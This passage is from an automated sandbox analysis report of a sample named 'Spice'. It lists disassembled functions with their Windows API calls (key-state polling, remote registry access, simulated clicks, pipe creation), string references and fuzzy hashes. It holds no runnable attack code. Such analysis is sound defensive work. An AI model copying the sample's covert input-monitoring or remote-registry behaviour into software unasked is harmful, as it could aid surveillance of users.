SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EF6AA2
DestroyWindow.USER32(?), ref: 00EF6AAA

Strings

SysAnimate32, xrefs: 00EF6A61

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: a2e1babe5e04201491c5b708b47de794c8b7046b20e847e3bfa7c8789504a9a8
Instruction ID: 5a9f564628abe0796ea924fdbdd11bd4b94cd1eb1d8667dbadc6e1af3cea9f13
Opcode Fuzzy Hash: a2e1babe5e04201491c5b708b47de794c8b7046b20e847e3bfa7c8789504a9a8
Instruction Fuzzy Hash: AA219D71200A0DAFEF108FA4DC81EBB77ADEB59368F10A619FB50B2190D731DC51A760

Uniqueness

Uniqueness Score: -1.00%

Function 00ED7357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00ED7377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED73AA
GetStdHandle.KERNEL32(0000000C), ref: 00ED73BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00ED73F6

Strings

nul, xrefs: 00ED73F1

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 579da28fb285244a66396afdee54d100256b18636b1503b75adb25b0d3353e0b
Instruction ID: 7bee24b9ece7fc0992bcb648a5fe9b7eebfb47b515b0d5f44430da1883cb73b6
Opcode Fuzzy Hash: 579da28fb285244a66396afdee54d100256b18636b1503b75adb25b0d3353e0b
Instruction Fuzzy Hash: E321417150420AABDB209F65DC45A9E7BE4EF44724F205A1AFCE1E73D0E7709852EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED7425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00ED7444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED7476
GetStdHandle.KERNEL32(000000F6), ref: 00ED7487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00ED74C1

Strings

nul, xrefs: 00ED74BC

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 77cb14412f713afe4b89e5460edca9f59c2e2d584ac0122999acbe846f050b7d
Instruction ID: 29a0e550ee26a6dac065d3c1519a7ac8c4415bb959ba51d60a4e570689a85c3f
Opcode Fuzzy Hash: 77cb14412f713afe4b89e5460edca9f59c2e2d584ac0122999acbe846f050b7d
Instruction Fuzzy Hash: 4621B2715082069BDB219F689C45A9A7BE8EF45734F201B0AF9F0F73D0EB709842C750

Uniqueness

Uniqueness Score: -1.00%

Function 00EDB283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EDB297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EDB2EB
__swprintf.LIBCMT ref: 00EDB304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00F00980), ref: 00EDB342

Strings

%lu, xrefs: 00EDB2FE

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 49342a8efe6b32745da838bff4e9c4de4cc09ca34309b3c968b7d023085b4b18
Instruction ID: 09ba11348c91052d7b46ed4c006b7e47e5406310e3df2cb835bf855a870a1887
Opcode Fuzzy Hash: 49342a8efe6b32745da838bff4e9c4de4cc09ca34309b3c968b7d023085b4b18
Instruction Fuzzy Hash: 0B213E74A00109AFCB10DF65C945EAEB7F8EF49704F108069F909E7392DB71EA46DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00ECAC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

Part of subcall function 00ECAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECAA6F
Part of subcall function 00ECAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECAA82
Part of subcall function 00ECAA52: GetCurrentThreadId.KERNEL32 ref: 00ECAA89
Part of subcall function 00ECAA52: AttachThreadInput.USER32(00000000), ref: 00ECAA90

GetFocus.USER32 ref: 00ECAC2A

Part of subcall function 00ECAA9B: GetParent.USER32(?), ref: 00ECAAA9

GetClassNameW.USER32(?,?,00000100), ref: 00ECAC73
EnumChildWindows.USER32(?,00ECACEB), ref: 00ECAC9B
__swprintf.LIBCMT ref: 00ECACB5

Strings

%s%d, xrefs: 00ECACAF

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 7d572bf921ab88a2780fa8d07514aa555aa6cd98b6413a1df538fe9869371353
Instruction ID: 056f7ea8f30c1b92ace0b8e182ef50cdf590766ca5ed249a1e1a7d5ba13785ce
Opcode Fuzzy Hash: 7d572bf921ab88a2780fa8d07514aa555aa6cd98b6413a1df538fe9869371353
Instruction Fuzzy Hash: F711D5746002086BDF11BFA0CE86FEA77ACAB44304F045079FD0CBA182DE7259469B72

Uniqueness

Uniqueness Score: -1.00%

Function 00ED22E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00ED2318

Strings

KEYS, xrefs: 00ED232F
REMOVE, xrefs: 00ED231E
EXISTS, xrefs: 00ED2340
APPEND, xrefs: 00ED2351

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: a736cbe1ffc39cc7c783373625e7ed826c2e87bafbb654ff081af9f95a6e20a1
Instruction ID: 29af1643f381fbb344c9f57a77ebd412379c648cd7b583ce300cc7270095a5a9
Opcode Fuzzy Hash: a736cbe1ffc39cc7c783373625e7ed826c2e87bafbb654ff081af9f95a6e20a1
Instruction Fuzzy Hash: 5B115E30900129DFCF04EF94D9514EEB7B8FF25344B5054A9D91477352EB365D16DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EEF23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EEF2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EEF320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EEF453
CloseHandle.KERNEL32(?), ref: 00EEF4D4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: c98269ef04cc57adf99ed8fcc06484365e54c61d75b40746bae816af3cfd1f5d
Instruction ID: aee79716f05c786eb533f8d79382719646159b6df56b81ffef018386f40af0f3
Opcode Fuzzy Hash: c98269ef04cc57adf99ed8fcc06484365e54c61d75b40746bae816af3cfd1f5d
Instruction Fuzzy Hash: F58171B16007009FD720EF29D846F2AB7E5AF48710F14D91DFA99EB2D2D7B0AC408B91

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Part of subcall function 00EF147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF040D,?,?), ref: 00EF1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EF07E3
RegCloseKey.ADVAPI32(?,?), ref: 00EF080F
RegCloseKey.ADVAPI32(00000000), ref: 00EF081C

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 2c062d725d7c877c5e34668049d26d4b3d77d20e0215dc13383034ce929a47f1
Instruction ID: 20c9ba1a65367ff9e69ca693eef2a612e4fdd26124f537a63c54e911106af98b
Opcode Fuzzy Hash: 2c062d725d7c877c5e34668049d26d4b3d77d20e0215dc13383034ce929a47f1
Instruction Fuzzy Hash: 7D517B71208208AFD704EF64C881F7AB7E9FF84304F14995DF699A72A2DB31E905DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EDEBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EDEC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EDEC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EDECCA

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EDECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EDECF7

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 6e1c96b695494951047d2b3522942ff0d337293e2d2110305a1c6907a36816e8
Instruction ID: f1cd74c61c42f6b9a7cde6b9c6462600d3bab7834bedfd222ceb9038cbd393c2
Opcode Fuzzy Hash: 6e1c96b695494951047d2b3522942ff0d337293e2d2110305a1c6907a36816e8
Instruction Fuzzy Hash: 28513775A00109DFCB11EF64C985AAEBBF5EF09314B188099E949BB3A2CB31ED51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EFA67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d27e7bd200f4b5aa9668ad02d7fa0f33921189be02a0c9ba76f9117d8f284b3f
Instruction ID: c994aa9fd350eadb5626ec13b1aa2979916f877838bcfd10b4392317a403c48f
Opcode Fuzzy Hash: d27e7bd200f4b5aa9668ad02d7fa0f33921189be02a0c9ba76f9117d8f284b3f
Instruction Fuzzy Hash: 4841C4B590410CAFD710EF28CC44FB9BBB9AB09314F195176FA19BB2D1C770AD41DA51

Uniqueness

Uniqueness Score: -1.00%

Function 00E72714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00E72727
ScreenToClient.USER32(00F377B0,?), ref: 00E72744
GetAsyncKeyState.USER32(00000001), ref: 00E72769
GetAsyncKeyState.USER32(00000002), ref: 00E72777

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: c5fcf22ae97c3a9b3b909dc72a326427859ece80fbc60cfb7cc555b730acf2ea
Instruction ID: b7367803c79e423a2890cb380e678d4c5fddfef32dbd17ce17737e592ef56277
Opcode Fuzzy Hash: c5fcf22ae97c3a9b3b909dc72a326427859ece80fbc60cfb7cc555b730acf2ea
Instruction Fuzzy Hash: 1D419435504109FFDF199F68C944AF9BBB4FB0A324F20935AF928B6290CB31AD54DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EC95D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00EC95E8
PostMessageW.USER32(?,00000201,00000001), ref: 00EC9692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EC969A
PostMessageW.USER32(?,00000202,00000000), ref: 00EC96A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EC96B0

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 17960fe840dd788ab8870d42dbfcf8f512263a1ee3ecb8a17a19da67f1664770
Instruction ID: 06ef89984dcc52e3bab5ea87dbc30b1267b5d4b45f1a9bf78f05f7b4d64edc0f
Opcode Fuzzy Hash: 17960fe840dd788ab8870d42dbfcf8f512263a1ee3ecb8a17a19da67f1664770
Instruction Fuzzy Hash: EB31EC71900219EFDB10CF68DA4CF9E3BB9FB44319F104228F824AB2D2C7B19920DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ECBD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00ECBD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ECBDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ECBDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ECBE18
_wcsstr.LIBCMT ref: 00ECBE22

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 8de1b603e052205123d4f7a58c199d9692d6486b3fc34476284209b5450ad68a
Instruction ID: 5fd7bbe06646a36f9d45d6c121324993e9ad500fa609c9a521c2c797ae7077b1
Opcode Fuzzy Hash: 8de1b603e052205123d4f7a58c199d9692d6486b3fc34476284209b5450ad68a
Instruction Fuzzy Hash: 9F210432204208BEEF255B759D4AFBB7B9DEF44B60F10502DFD09EA191EF62CC4196A0

Uniqueness

Uniqueness Score: -1.00%

Function 00EFB7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3

GetWindowLongW.USER32(?,000000F0), ref: 00EFB804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EFB829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EFB841
GetSystemMetrics.USER32(00000004), ref: 00EFB86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EE155C,00000000), ref: 00EFB888

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 4afe5fe8ea2435d7c47f7834d34a78ced605175fd8fe86214156b817ed44c48a
Instruction ID: 97122ac78d1bf0dc9930fc1822752236d61fad204ff201c13a6e47f229e1e720
Opcode Fuzzy Hash: 4afe5fe8ea2435d7c47f7834d34a78ced605175fd8fe86214156b817ed44c48a
Instruction Fuzzy Hash: DE21917191425DAFCB249F38CC08B7A3BA9FB45775F245729FA25E61E0E7309810DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00EE6159
GetForegroundWindow.USER32 ref: 00EE6170
GetDC.USER32(00000000), ref: 00EE61AC
GetPixel.GDI32(00000000,?,00000003), ref: 00EE61B8
ReleaseDC.USER32(00000000,00000003), ref: 00EE61F3

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: a6851758687f35a78a8144feb7a87c6a07d87feb4a2a9d32e7208d6ee7166a7c
Instruction ID: 08ce8cdafd7e248ea2fbcf36585dad186accbed6f92565c9745355b2c11cff2f
Opcode Fuzzy Hash: a6851758687f35a78a8144feb7a87c6a07d87feb4a2a9d32e7208d6ee7166a7c
Instruction Fuzzy Hash: 7221A175A01608EFD710EF65DD84A9ABBF9FF88350F048469E94AA7352CE70AC01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E716CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E71729
SelectObject.GDI32(?,00000000), ref: 00E71738
BeginPath.GDI32(?), ref: 00E7174F
SelectObject.GDI32(?,00000000), ref: 00E71778

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 15e30d01a8e7a0444d97b74d9428c7ac1f96baad8b6090611acace06bdf59573
Instruction ID: 5f18ca7667ba3f50f23ab71c12f8daea8b2073eec275003654da739024826cbc
Opcode Fuzzy Hash: 15e30d01a8e7a0444d97b74d9428c7ac1f96baad8b6090611acace06bdf59573
Instruction Fuzzy Hash: 5621B67040430CEFDB20AF68DC4876E7BFAF701325F248256F919B61A0D7709951EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ECC837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00ECC84C
_memcmp.LIBCMT ref: 00ECC86A
_memcmp.LIBCMT ref: 00ECC87D
_memcmp.LIBCMT ref: 00ECC895
_memcmp.LIBCMT ref: 00ECC8AD

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
